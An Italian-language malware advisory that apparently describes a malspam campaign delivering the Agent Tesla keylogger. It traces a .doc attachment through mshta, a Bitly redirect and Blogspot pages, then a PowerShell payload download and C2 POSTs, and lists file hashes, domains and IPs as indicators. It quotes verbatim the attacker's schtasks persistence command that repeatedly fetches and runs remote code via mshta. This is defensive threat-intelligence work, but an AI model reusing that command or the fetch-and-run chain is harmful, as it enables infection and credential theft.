Agent Tesla è uno Spyware che, registrando le sequenze di tasti premuti e le azioni dell’utente, esfiltra informazioni dai sistemi vittima.
Questo Spyware è stato creato utilizzando il framework .Net e trasmette i dati personali al server di comando e controllo (C2). Agent Tesla è in grado di accedere alle informazioni salvate nei browser Web, nei client di posta elettronica e nei client FTP.
Il malware è dotato di meccanismi di evasion dell’antivirus e di persistenza sul sistema per ripartire anche a fronte del riavvio del sistema compromesso.
Negli ultimi giorni è stata rilevata una nuova campagna di malspam. La mail invita l’utente a scaricare ed aprire l’allegato.
L’allegato della mail è un file in formato doc che attraverso mshta.exe contatta il dominio https://bitly[.]com/asdqwdwdsfvcxvccv il quale risponde con il seguente file html:
<html>
<head><title>Bitly</title></head>
<body><a href="https://sqlserviceazure.blogspot[.]com/p/bathindasboba[.]html">moved here</a></body>
</html>Dopo una serie di passaggi viene creato un task schedulato attraverso il comando:
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr """"\""""MsHtA""""\""""http://1230948%1230948@sqlserverserviceagent.blogspot.com/p/justtheback.html\""""Contemporaneamente viene scaricato ed eseguito tramite PowerShell il sample di Agent Tesla. Il quale inizierà a comunicare con il server di comando e controllo attraverso delle POST a http://microsoftazyresql.duckdns.org/j/p29oa/mawa/eae7bc3b675ad7042607.php
Agent Tesla è un keylogger e data-stealer, capace di rubare le credenziali contenute all’interno dei principali Browser, oltre ai dati di configurazione e le credenziali di VPN, FTP e client di posta.
IOC
File DOC:
- Nome invoice#6317236-booking.com,pdf.doc
- MD5 d74f268b986fecfa03b81029dd134811
- SHA1 d49848ac2888e080883a427ef18b406fdcab6b9b
- SHA256 81fcb3dce45b041a91b0c0e01c27e032d7e8d26217d4b6d669ce258b491a830d
Domini:
- C2
- microsoftazyresql.duckdns[.]org
- 103.147.185[.]68
- Dropper
- bitly[.]com
- 67.199.248[.]14
